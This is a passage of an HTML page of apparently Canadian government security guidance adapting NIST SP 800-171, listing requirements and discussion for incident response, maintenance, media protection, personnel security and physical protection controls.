Systems (ITSP.30.031)</a></p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-6">3.6 Incident response</h3> <p>The Incident response controls support the establishment of an operational incident handling capability for organizational systems that includes adequate preparation, monitoring, detection, analysis, containment, recovery, and response. Incidents are monitored, documented, and reported to appropriate organizational officials and authorities.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-06-01">03.06.01 Incident handling</a></li> <li><a href="#03-06-02">03.06.02 Incident monitoring, reporting, and response assistance</a></li> <li><a href="#03-06-03">03.06.03 Incident response testing</a></li> <li><a href="#03-06-04">03.06.04 Incident response training</a></li> <li><a href="#03-06-05">03.06.05 Incident response plan</a></li> </ul> </section>–> <details><summary><h4 id="03-06-01">03.06.01 Incident handling</h4> </summary><p>Implement an incident-handling capability that is consistent with the incident response plan and includes preparation, detection and analysis, containment, eradication, and recovery</p> <h5>Discussion</h5> <p>Incident-related information can be obtained from a variety of sources, including audit monitoring, network monitoring, physical access monitoring, user and administrator reports, and reported supply chain events. An effective incident handling capability involves coordination among many organizational entities, including mission and business owners, system owners, human resources offices, physical and personnel security offices, legal departments, operations personnel, and procurement offices.</p> <p>An incident that involves personal information is considered a privacy breach. A privacy breach results in the loss of control, compromise, unauthorized disclosure, unpermitted use, unlawful collection, improper retention or disposal, or a similar occurrence where a person other than an authorized user accesses or potentially accesses or an authorized user accesses or potentially accesses such information for other than authorized purposes.</p> <p>If the incident involves the breach of personal information, notification to the contract owner is mandatory.</p> <h5>References</h5> <p>Source control: IR-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003)</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/161/r1/final">NIST SP 800-161 Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations</a></li> </ul></details><details><summary><h4 id="03-06-02">03.06.02 Incident monitoring, reporting, and response assistance</h4> </summary><ol class="lst-upr-alph"><li>Track and document system security incidents</li> <li>Report suspected incidents to the organizational incident response capability within [Assignment: organization-defined time period]</li> <li>Report incident information to [Assignment: organization-defined authorities]</li> <li>Provide an incident response support resource that offers advice and assistance to system users for the handling and reporting of incidents</li> </ol><h5>Discussion</h5> <p>Documenting incidents includes maintaining records about each incident, the status of the incident, and other pertinent information necessary for forensics as well as evaluating incident details, trends, and handling. Incident information can be obtained from many sources, including network monitoring, incident reports, incident response teams, user complaints, supply chain partners, audit monitoring, physical access monitoring, and user and administrator reports. <a href="#03-06-01">Incident handling 03.06.01</a> provides information on the types of incidents that are appropriate for monitoring. The types of incidents reported, the content and timeliness of the reports, and the reporting authorities reflect applicable laws, jurisprudence, Orders in Council, directives, regulations, policies, standards, and guidelines. Incident information informs risk assessments, the effectiveness of security and privacy assessments, the security requirements for acquisitions, and the selection criteria for technology products. Incident response support resources provided by organizations include help desks, assistance groups, automated ticketing systems to open and track incident response tickets, and access to forensic services or consumer redress services, when required.</p> <h5>References</h5> <p>Source controls: IR-05, IR-06, IR-07<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/61/r2/final">NIST SP 800-61 Computer Security Incident Handling Guide</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response</a></li> <li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003)</a></li> </ul></details><details><summary><h4 id="03-06-03">03.06.03 Incident response testing</h4> </summary><p>Test the effectiveness of the incident response capability [Assignment: organization-defined frequency].</p> <h5>Discussion</h5> <p>Organizations test incident response capabilities to determine their effectiveness and identify potential weaknesses or deficiencies. Incident response testing includes the use of checklists, walk-through or tabletop exercises, and simulations. Incident response testing can include a determination of the effects of incident response on organizational operations, organizational assets, and individuals. Qualitative and quantitative data can help determine the effectiveness of incident response processes.</p> <h5>References</h5> <p>Source control: IR-03<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/84/final">NIST SP 800-84 Guide to Test, Training, and Exercise Programs for <abbr title="information technology">IT</abbr> Plans and Capabilities</a></p> </details><details><summary><h4 id="03-06-04">03.06.04 Incident response training</h4> </summary><ol class="lst-upr-alph"><li>Provide incident response training to system users consistent with assigned roles and responsibilities: <ol><li>within [Assignment: organization-defined time period] of assuming an incident response role or responsibility or acquiring system access</li> <li>when required by system changes</li> <li>[Assignment: organization-defined frequency] thereafter</li> </ol></li> <li>Review and update incident response training content [Assignment: organization-defined frequency] and following [Assignment: organization-defined events]</li> </ol><h5>Discussion</h5> <p>Incident response training is associated with the assigned roles and responsibilities of organizational personnel to ensure that the appropriate content and level of detail are included in such training. For example, users may only need to know whom to call or how to recognize an incident; system administrators may require additional training on how to handle incidents; and incident responders may receive specific training on forensics, data collection techniques, reporting, system recovery, and system restoration. Incident response training includes user training in identifying and reporting suspicious activities from external and internal sources. Incident response training for users may be provided as part of <a href="#03-02-02">Role-based training 03.02.02</a>. Events that may cause an update to incident response training content include incident response plan testing, response to an actual incident, audit or assessment findings, or changes in applicable laws, jurisprudence, Orders in Council, policies, directives, regulations, standards, and guidelines.</p> <h5>References</h5> <p>Source control: IR-02<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/86/final">NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/137/final">NIST SP 800-137 Information Security Continuous Monitoring (ISCM)</a></li> </ul></details><details><summary><h4 id="03-06-05">03.06.05 Incident response plan</h4> </summary><ol class="lst-upr-alph"><li>Develop an incident response plan that: <ol><li>provides the organization with a roadmap for implementing its incident response capability</li> <li>describes the structure and organization of the incident response capability</li> <li>provides a high-level approach for how the incident response capability fits into the overall organization</li> <li>defines reportable incidents</li> <li>addresses the sharing of incident information</li> <li>designates responsibilities to organizational entities, personnel, or roles</li> </ol></li> <li>Distribute copies of the incident response plan to designated incident response personnel (identified by name and/or by role) and organizational elements</li> <li>Update the incident response plan to address system and organizational changes or problems encountered during plan implementation, execution, or testing</li> <li>Protect the incident response plan from unauthorized disclosure</li> </ol><h5>Discussion</h5> <p>It is important that organizations develop and implement a coordinated approach to incident response. Organizational mission and business functions determine the structure of incident response capabilities. As part of the incident response capabilities, organizations consider the coordination and sharing of information with external organizations, including external service providers and other organizations involved in the supply chain.</p> <h5>References</h5> <p>Source control: IR-08<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Cyber Centre Developing your incident response plan (ITSAP.40.003) </a></li> <li><a href="https://www.publicsafety.gc.ca/cnt/rsrcs/pblctns/dvlpng-ndnt-rspns-pln/index-en.aspx">Public Safety Canada Developing an Operational Technology and Information Technology Incident Response Plan </a></li> <li><a href="https://laws-lois.justice.gc.ca/eng/regulations/SOR-2018-64/index.html">Breach of Security Safeguards Regulations SOR/2018-64 </a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-7">3.7 Maintenance</h3> <p>The Maintenance controls support periodic and timely maintenance on organizational systems and provide effective controls on the tools, techniques, mechanisms, and personnel used to conduct system maintenance to ensure its ongoing availability.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-07-01">03.07.01 Not allocated</a></li> <li><a href="#03-07-02">03.07.02 Not allocated</a></li> <li><a href="#03-07-03">03.07.03 Not allocated</a></li> <li><a href="#03-07-04">03.07.04 Maintenance tools</a></li> <li><a href="#03-07-05">03.07.05 Non-local maintenance</a></li> <li><a href="#03-07-06">03.07.06 Maintenance personnel</a></li> </ul> </section>–> <h4 id="03-07-01">03.07.01 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-07-02">03.07.02 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-07-03">03.07.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-07-04">03.07.04 Maintenance tools</h4> </summary><ol class="lst-upr-alph"><li>Approve, control, and monitor the use of system maintenance tools</li> <li>Check media containing diagnostic and test programs for malicious code before the media are used in the system</li> <li>Prevent the removal of system maintenance equipment containing specified information by verifying that there is no specified information on the equipment, sanitizing or destroying the equipment, or retaining the equipment within the facility</li> </ol><h5>Discussion</h5> <p>Approving, controlling, monitoring, and reviewing maintenance tools address security-related issues associated with the tools that are used for diagnostic and repair actions on the system. Maintenance tools can include hardware and software diagnostic and test equipment as well as packet sniffers. The tools may be pre-installed, brought in with maintenance personnel on media, cloud-based, or downloaded from a website. Diagnostic and test programs are potential vehicles for transporting malicious code into the system, either intentionally or unintentionally. Examples of media inspection include checking the cryptographic hash or digital signatures of diagnostic and test programs and media.</p> <p>If organizations inspect media that contain diagnostic and test programs and determine that the media also contains malicious code, the incident is handled consistent with incident handling policies and procedures. A periodic review of maintenance tools can result in the withdrawal of approval for outdated, unsupported, irrelevant, or no-longer-used tools. Maintenance tools do not address the hardware and software components that support maintenance and are considered a part of the system.</p> <h5>References</h5> <p>Source controls: MA-03, MA-03(01), MA-03(02), MA-03(03)<br /> Supporting publications: <a href="https://www.cyber.gc.ca/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006)</a></p> </details><details><summary><h4 id="03-07-05">03.07.05 Non-local maintenance</h4> </summary><ol class="lst-upr-alph"><li>Approve and monitor non-local maintenance and diagnostic activities.</li> <li>Implement multi-factor authentication and replay resistance in the establishment of non-local maintenance and diagnostic sessions.</li> <li>Terminate session and network connections when non-local maintenance is completed.</li> </ol><h5>Discussion</h5> <p>Non-local maintenance and diagnostic activities are conducted by individuals who communicate through an external or internal network. Local maintenance and diagnostic activities are carried out by individuals who are physically present at the system location and not communicating across a network connection. Authentication techniques used to establish non-local maintenance and diagnostic sessions reflect the requirements in <a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a>.</p> <h5>References</h5> <p>Source control: MA-04<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/user-authentication-guidance-information-technology-systems-itsp30031-v3">Cyber Centre User Authentication Guidance for Information Technology Systems (ITSP.30.031) </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> <li><a href="/en/identity-credential-and-access-management-icam-itsap30018">Cyber Centre Identity, Credential, and Access Management (ICAM) (ITSAP.30.018) </a></li> </ul></details><details><summary><h4 id="03-07-06">03.07.06 Maintenance personnel</h4> </summary><ol class="lst-upr-alph"><li>Establish a process for maintenance personnel authorization</li> <li>Maintain a list of authorized maintenance organizations or personnel</li> <li>Verify that non-escorted personnel who perform maintenance on the system possess the required access authorizations</li> <li>Designate organizational personnel with required access authorizations and technical competence to supervise the maintenance activities of personnel who do not possess the required access authorizations</li> </ol><h5>Discussion</h5> <p>Maintenance personnel refers to individuals who perform hardware or software maintenance on the system, while <a href="#03-10-01">Physical access authorizations 03.10.01</a> addresses physical access for individuals whose maintenance duties place them within the physical protection perimeter of the system. The technical competence of supervising individuals relates to the maintenance performed on the system, while having required access authorizations refers to maintenance on and near the system. Individuals who have not been previously identified as authorized maintenance personnel (e.g., manufacturers, consultants, systems integrators, and vendors) may require privileged access to the system, such as when they are required to conduct maintenance with little or no notice. Organizations may choose to issue temporary credentials to these individuals based on their risk assessments. Temporary credentials may be for one-time use or for very limited time periods.</p> <h5>References</h5> <p>Source control: MA-05<br /> Supporting publications: None</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-8">3.8 Media protection</h3> <p>Physically control and securely store system media containing <abbr title="controlled information">CI</abbr>.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-08-01">03.08.01 Media storage</a></li> <li><a href="#03-08-02">03.08.02 Media access</a></li> <li><a href="#03-08-03">03.08.03 Media sanitization</a></li> <li><a href="#03-08-04">03.08.04 Media marking</a></li> <li><a href="#03-08-05">03.08.05 Media transport</a></li> <li><a href="#03-08-06">03.08.06 Not allocated</a></li> <li><a href="#03-08-07">03.08.07 Media use</a></li> <li><a href="#03-08-08">03.08.08 Not allocated</a></li> <li><a href="#03-08-09">03.08.09 System backup&nbsp;– cryptographic protection</a></li> </ul> </section>–> <details><summary><h4 id="03-08-01">03.08.01 Media storage</h4> </summary><p>Physically control and securely store system media containing specified information.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. Digital media includes diskettes, flash drives, magnetic tapes, external or removable solid state or magnetic drives, compact discs, and digital versatile discs. Non-digital media includes paper and microfilm. Physically controlling stored media includes conducting inventories, establishing procedures to allow individuals to check out and return media to libraries, and maintaining accountability for stored media. Secure storage includes a locked drawer, desk, or cabinet or a controlled media library. Controlled areas provide physical and procedural controls to meet the requirements established for protecting information and systems. Sanitization techniques (e.g., cryptographically erasing, destroying, clearing, and purging) prevent the disclosure of specified information to unauthorized individuals. The sanitization process removes specified information from media such that the information cannot be retrieved or reconstructed.</p> <h5>References</h5> <p>Source control: MP-04<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices </a></li> <li><a href="/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> </ul></details><details><summary><h4 id="03-08-02">03.08.02 Media access</h4> </summary><p>Restrict access to specified information on system media to authorized personnel or roles.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. Access to specified information on system media can be restricted by physically controlling such media. This includes conducting inventories, ensuring that procedures are in place to allow individuals to check out and return media to the media library, and maintaining accountability for stored media. For digital media, access to specified information can be restricted by using cryptographic means. Encrypting data in storage or at rest is addressed in <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a>.</p> <h5>References</h5> <p>Source control: MP-02<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><details><summary><h4 id="03-08-03">03.08.03 Media sanitization</h4> </summary><p>Sanitize system media containing specified information prior to disposal, release out of organizational control, or release for reuse.</p> <h5>Discussion</h5> <p>Media sanitization applies to digital and non-digital media subject to disposal or reuse, whether or not the media are considered removable. Examples include digital media in scanners, copiers, printers, notebook computers, workstations, mobile devices, network components, and non-digital media. The sanitization process removes specified information from media such that the information cannot be retrieved or reconstructed. Sanitization techniques (e.g., cryptographically erasing, clearing, purging, and destroying) prevent the disclosure of specified information to unauthorized individuals when such media is reused or released for disposal. Cyber Centre and <abbr title="Royal Canadian Mounted Police">RCMP</abbr> endorsed standards control the sanitization process for media containing specified information and may require destruction when other methods cannot be applied to the media.</p> <h5>References</h5> <p>Source control: MP-06<br /> Supporting publications:</p> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/it-media-sanitization-itsp40006">Cyber Centre <abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006) </a></li> <li><a href="https://www.rcmp-grc.gc.ca/physec-secmat/res-lim/pubs/seg/html/home_e.htm"><abbr title="Royal Canadian Mounted Police">RCMP</abbr> G1-001 Security Equipment Guide (restricted to <abbr title="Government of Canada">GC</abbr>)</a></li> </ul></details><details><summary><h4 id="03-08-04">03.08.04 Media marking</h4> </summary><p>Mark system media containing specified information to indicate distribution limitations, handling caveats, and applicable specified information markings.</p> <h5>Discussion</h5> <p>System media includes digital and non-digital media. Marking refers to the use or application of human-readable security attributes. Labeling refers to the use of security attributes for internal system data structures. Digital media includes diskettes, magnetic tapes, external or removable solid state or magnetic drives, flash drives, compact discs, and digital versatile discs. Non-digital media includes paper and microfilm. Specified information includes any information, other than classified, that a <abbr title="Government of Canada">GC</abbr> authority identifies and qualifies in a contract as requiring safeguarding.</p> <h5>References</h5> <p>Source control: MP-03<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-08-05">03.08.05 Media transport</h4> </summary><ol class="lst-upr-alph"><li>Protect and control system media that contain specified information during transport outside of controlled areas</li> <li>Maintain accountability of system media that contain specified information during transport outside of controlled areas.</li> <li>Document activities associated with the transport of system media that contain specified information</li> </ol><h5>Discussion</h5> <p>System media includes digital and non-digital media. Digital media includes flash drives, diskettes, magnetic tapes, external or removable solid state or magnetic drives, compact discs, and digital versatile discs. Non-digital media includes microfilm and paper. Controlled areas are spaces for which organizations provide physical or procedural measures to meet the requirements established for protecting specified information and systems. Media protection during transport can include cryptography and/or locked containers. Activities associated with media transport include releasing media for transport, ensuring that media enter the appropriate transport processes, and the actual transport. Authorized transport and courier personnel may include individuals external to the organization. Maintaining accountability of media during transport includes restricting transport activities to authorized personnel and tracking or obtaining records of transport activities as the media move through the transportation system to prevent and detect loss, destruction, or tampering. This requirement is related to <a href="#03-13-08">Transmission and storage confidentiality 03.13.08</a> and <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: MP-05, SC-28<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><h4 id="03-08-06">03.08.06 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-08-07">03.08.07 Media use</h4> </summary><ol class="lst-upr-alph"><li>Restrict or prohibit the use of [Assignment: organization-defined types of system media]</li> <li>Prohibit the use of removable system media without an identifiable owner</li> </ol><h5>Discussion</h5> <p>In contrast to requirement <a href="#03-08-01">Media storage 03.08.01</a>, which restricts user access to media, this requirement restricts or prohibits the use of certain types of media, such as external hard drives, flash drives, or smart displays. Organizations can use technical and non-technical measures (e.g., policies, procedures, and rules of behaviour) to control the use of system media. For example, organizations may control the use of portable storage devices by using physical cages on workstations to prohibit access to external ports or disabling or removing the ability to insert, read, or write to devices.</p> <p>Organizations may limit the use of portable storage devices to only approved devices, including devices provided by the organization, devices provided by other approved organizations, and devices that are not personally owned. Organizations may also control the use of portable storage devices based on the type of device — prohibiting the use of writeable, portable devices — and implement this restriction by disabling or removing the capability to write to such devices. Limits on the use of organization-controlled system media in external systems include restrictions on how the media may be used and under what conditions. Requiring identifiable owners (e.g., individuals, organizations, or projects) for removable system media reduces the risk of using such technologies by allowing organizations to assign responsibility and accountability for addressing known vulnerabilities in the media (e.g., insertion of malicious code).</p> <h5>References</h5> <p>Source control: MP-07<br /> Supporting publications: <a href="https://csrc.nist.gov/pubs/sp/800/111/final">NIST SP 800-111 Guide to Storage Encryption Technologies for End User Devices</a></p> </details><h4 id="03-08-08">03.08.08 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-08-09">03.08.09 System backup – cryptographic protection</h4> </summary><ol class="lst-upr-alph"><li>Protect the confidentiality of backup information</li> <li>Implement cryptographic mechanisms to prevent the unauthorized disclosure of specified information at backup storage locations</li> </ol><h5>Discussion</h5> <p>The selection of cryptographic mechanisms is based on the need to protect the confidentiality of backup information. Hardware security module (HSM) devices safeguard and manage cryptographic keys and provide cryptographic processing. Cryptographic operations (e.g., encryption, decryption, and signature generation and verification) are typically hosted on the <abbr title="hardware security module">HSM</abbr> device, and many implementations provide hardware-accelerated mechanisms for cryptographic operations. This requirement is related to <a href="#03-13-11">Cryptographic protection 03.13.11</a>.</p> <h5>References</h5> <p>Source controls: CP-09, CP-09(08)<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/34/r1/upd1/final">NIST SP 800-34 Contingency Planning Guide for Federal Information Systems</a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/130/final">NIST SP 800-130 A Framework for Designing Cryptographic Key Management Systems</a></li> </ul></details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-9">3.9 Personnel security</h3> <p>The Personnel security controls support the procedures required to ensure that all personnel who have access to systems have the necessary authorizations as well as appropriate security screening levels. They ensure that organizational information and systems are protected during and after personnel actions such as terminations and transfers.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-09-01">03.09.01 Personnel screening</a></li> <li><a href="#03-09-02">03.09.02 Personnel termination and transfer</a></li> </ul> </section>–> <details><summary><h4 id="03-09-01">03.09.01 Personnel screening</h4> </summary><ol class="lst-upr-alph"><li>Screen individuals prior to authorizing access to the system</li> <li>Rescreen individuals in accordance with [Assignment: organization-defined conditions requiring rescreening]</li> </ol><h5>Discussion</h5> <p>Personnel security screening activities involve the assessment of the conduct, integrity, judgment, loyalty, reliability, and stability of an individual (i.e., the individual’s trustworthiness) prior to authorizing access to the system or when elevating system access. The screening and rescreening activities reflect applicable federal laws, Orders in Council, directives, policies, regulations, and criteria established for the level of access required for the assigned positions.</p> <h5>References</h5> <p>Source control: PS-03<br /> Supporting publications:</p> <ul><li><a href="https://csrc.nist.gov/pubs/sp/800/181/r1/final">NIST SP 800-181 Workforce Framework for Cybersecurity (NICE Framework) </a></li> <li><a href="https://www.tpsgc-pwgsc.gc.ca/esc-src/msc-csm/index-eng.html">PSPC Contract Security Manual </a></li> </ul></details><details><summary><h4 id="03-09-02">03.09.02 Personnel termination and transfer</h4> </summary><ol class="lst-upr-alph"><li>When individual employment is terminated: <ol><li>disable system access within [Assignment: organization-defined time period]</li> <li>terminate or revoke authenticators and credentials associated with the individual</li> <li>retrieve security-related system property</li> </ol></li> <li>When individuals are reassigned or transferred to other positions in the organization: <ol><li>review and confirm the ongoing operational need for current logical and physical access authorizations to the system and facility</li> <li>modify access authorization to correspond with any changes in operational need</li> </ol></li> </ol><h5>Discussion</h5> <p>Security-related system property includes hardware authentication tokens, system administration technical manuals, keys, identification cards, and building passes. Exit interviews ensure that terminated individuals understand the security constraints imposed by being former employees and that accountability is achieved for the organizational property. Security topics at exit interviews include reminding individuals of potential limitations on future employment and nondisclosure agreements. Exit interviews may not always be possible for some individuals, including in cases related to the unavailability of supervisors, illnesses, or job abandonment.</p> <p>The timely execution of termination actions is essential for individuals who have been terminated for cause. Organizations may consider disabling the accounts of individuals who are being terminated prior to the individuals being notified. This requirement applies to the reassignment or transfer of individuals when the personnel action is permanent or of such extended duration as to require protection. Protections that may be required for transfers or reassignments to other positions within organizations include returning old and issuing new identification cards, keys, and building passes; changing system access authorizations (i.e., privileges); closing system accounts and establishing new accounts; and providing access to official records to which individuals had access at previous work locations in previous system accounts.</p> <h5>References</h5> <p>Source controls: PS-04, PS-05<br /> Supporting publications: None</p> </details></section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h3 class="h2 mrgn-tp-lg" id="3-10">3.10 Physical protection</h3> <p>The Physical protection controls support the control of physical access to systems, equipment, and the respective operating environments to authorized individuals. They facilitate the protection of the physical plant and support infrastructure for systems, the protection of systems against environmental hazards, and provide appropriate environmental controls in facilities containing systems.</p> <!–<section> <h4>In this section</h4> <ul class="list-unstyled"> <li><a href="#03-10-01">03.10.01 Physical access authorizations</a></li> <li><a href="#03-10-02">03.10.02 Monitoring physical access</a></li> <li><a href="#03-10-03">03.10.03 Not allocated</a></li> <li><a href="#03-10-04">03.10.04 Not allocated</a></li> <li><a href="#03-10-05">03.10.05 Not allocated</a></li> <li><a href="#03-10-06">03.10.06 Alternate work site</a></li> <li><a href="#03-10-07">03.10.07 Physical access control</a></li> <li><a href="#03-10-08">03.10.08 Access control for transmission</a></li> </ul> </section>–> <details><summary><h4 id="03-10-01">03.10.01 Physical access authorizations</h4> </summary><ol class="lst-upr-alph"><li>Develop, approve, and maintain a list of individuals with authorized access to the physical location where the system resides</li> <li>Issue authorization credentials for physical access</li> <li>Review the physical access list [Assignment: organization-defined frequency]</li> <li>Remove individuals from the physical access list when access is no longer required</li> </ol><h5>Discussion</h5> <p>A facility can include one or more physical locations containing systems or system components that process, store, or transmit specified information. Physical access authorizations apply to employees and visitors. Individuals with permanent physical access authorization credentials are not considered visitors. Authorization credentials include identification badges, identification cards, and smart cards. Organizations determine the strength of the authorization credentials consistent with applicable laws, Orders in Council, directives, regulations, policies, standards, and guidelines. Physical access authorizations may not be necessary to access certain areas within facilities that are designated as publicly accessible.</p> <h5>References</h5> <p>Source control: PE-02<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-10-02">03.10.02 Monitoring physical access</h4> </summary><ol class="lst-upr-alph"><li>Monitor physical access to the facility where the system resides to detect and respond to physical security incidents</li> <li>Review physical access logs [Assignment: organization-defined frequency] and upon occurrence of [Assignment: organization-defined events or potential indications of events]</li> </ol><h5>Discussion</h5> <p>A facility can include one or more physical locations containing systems or system components that process, store, or transmit specified information. Physical access monitoring includes publicly accessible areas within organizational facilities. Examples of physical access monitoring include guards, video surveillance equipment (i.e., cameras), and sensor devices. Reviewing physical access logs can help identify suspicious activity, anomalous events, or potential threats. The reviews can be supported by audit logging controls if the access logs are part of an automated system. Incident response capabilities include investigations of physical security incidents and responses to those incidents. Incidents include security violations or suspicious physical access activities, such as access outside of normal work hours, repeated access to areas not normally accessed, access for unusual lengths of time, and out-of-sequence access.</p> <h5>References</h5> <p>Source control: PE-06<br /> Supporting publications: None</p> </details><h4 id="03-10-03">03.10.03 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-10-04">03.10.04 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <h4 id="03-10-05">03.10.05 Not allocated</h4> <p>Withdrawn by <abbr title="National Institute of Standards and Technology">NIST</abbr>.</p> <details><summary><h4 id="03-10-06">03.10.06 Alternate work site</h4> </summary><ol class="lst-upr-alph"><li>Determine alternate work sites allowed for use by employees</li> <li>Employ the following security requirements at alternate work sites: [Assignment: organization-defined security requirements]</li> </ol><h5>Discussion</h5> <p>Alternate work sites include the private residences of employees or other facilities designated by the organization. Alternate work sites can provide readily available alternate locations during contingency operations. Organizations can define different security requirements for specific alternate work sites or types of sites, depending on the work-related activities conducted at the sites. Assessing the effectiveness of the requirements and providing a means to communicate incidents at alternate work sites supports the contingency planning activities of organizations.</p> <h5>References</h5> <p>Source control: PE-17<br /> Supporting publications:</p> <ul><li><a href="/en/guidance/end-user-device-security-bring-your-own-device-byod-deployment-models-itsm70003">Cyber Centre End user device security for Bring-Your-Own-Device (BYOD) deployment models (ITSM.70.003) </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/46/r2/final">NIST SP 800-46 Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security </a></li> <li><a href="https://csrc.nist.gov/pubs/sp/800/114/r1/final">NIST SP 800-114 User’s Guide to Telework and Bring Your Own Device (BYOD) Security</a></li> </ul></details><details><summary><h4 id="03-10-07">03.10.07 Physical access control</h4> </summary><ol class="lst-upr-alph"><li>Enforce physical access authorizations at entry and exit points to the facility where the system resides by: <ol><li>verifying individual physical access authorizations before granting access to the facility</li> <li>controlling ingress and egress with physical access control systems, devices or guards</li> </ol></li> <li>Maintain physical access audit logs for entry or exit points</li> <li>Escort visitors and control visitor activity</li> <li>Secure keys, combinations, and other physical access devices</li> <li>Control physical access to output devices to prevent unauthorized individuals from obtaining access to specified information</li> </ol><h5>Discussion</h5> <p>This requirement addresses physical locations containing systems or system components that process, store, or transmit specified information. Organizations determine the types of guards needed, including professional security staff or administrative staff. Physical access devices include keys, locks, combinations, biometric readers, and card readers. Physical access control systems comply with applicable laws, Orders in Council, directives, policies, regulations, standards, and guidelines. Organizations have flexibility in the types of audit logs employed. Audit logs can be procedural, automated, or some combination thereof. Physical access points can include exterior access points, interior access points to systems that require supplemental access controls, or both. Physical access control applies to employees and visitors. Individuals with permanent physical access authorizations are not considered visitors.</p> <p>Controlling physical access to output devices includes placing output devices in locked rooms or other secured areas with keypad or card reader access controls and only allowing access to authorized individuals, placing output devices in locations that can be monitored by personnel, installing monitor or screen filters, and using headphones. Examples of output devices include monitors, printers, scanners, facsimile machines, audio devices, and copiers.</p> <h5>References</h5> <p>Source controls: PE-03, PE-05<br /> Supporting publications: None</p> </details><details><summary><h4 id="03-10-08">03.10.08 Access control for transmission</h4> </summary><p>Control physical access to system distribution and transmission lines in organizational facilities.</p> <h5>Discussion</h5> <p>Safeguarding measures applied to system distribution and transmission lines prevent accidental damage, disruption, and physical tampering. Such measures may also be necessary to prevent eavesdropping or the modification of unencrypted transmissions. 